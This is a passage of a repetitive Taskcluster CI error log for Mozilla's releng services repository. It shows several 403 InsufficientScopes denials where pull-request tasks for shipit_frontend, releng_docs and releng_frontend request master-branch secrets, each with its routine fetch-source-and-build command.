\\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.857Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.857Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.857Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.057Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"N0KLxoW3TQuhngoPjfCs6Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.857Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.857Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.857Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.057Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"N0KLxoW3TQuhngoPjfCs6Q\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:01.857Z\",\n                    \"deadline\": \"2016-09-24T13:09:01.857Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DfNtv5WrSHK3wLJy5Vvp3g\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:01.857Z\"\n                },\n                \"time\": \"2016-09-23T13:09:02.057Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U3o-Kx6tTFap5WqERDqXXw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.855Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.855Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.855Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.205Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U3o-Kx6tTFap5WqERDqXXw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.855Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.855Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.855Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.205Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"U3o-Kx6tTFap5WqERDqXXw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:01.855Z\",\n                    \"deadline\": \"2016-09-24T13:09:01.855Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DfNtv5WrSHK3wLJy5Vvp3g\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:01.855Z\"\n                },\n                \"time\": \"2016-09-23T13:09:02.205Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"e9Bbt1GnQNq_eQY49s3C5A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.856Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.856Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.856Z\\\"\\n}\\n  time:     2016-09-23T13:09:04.064Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": 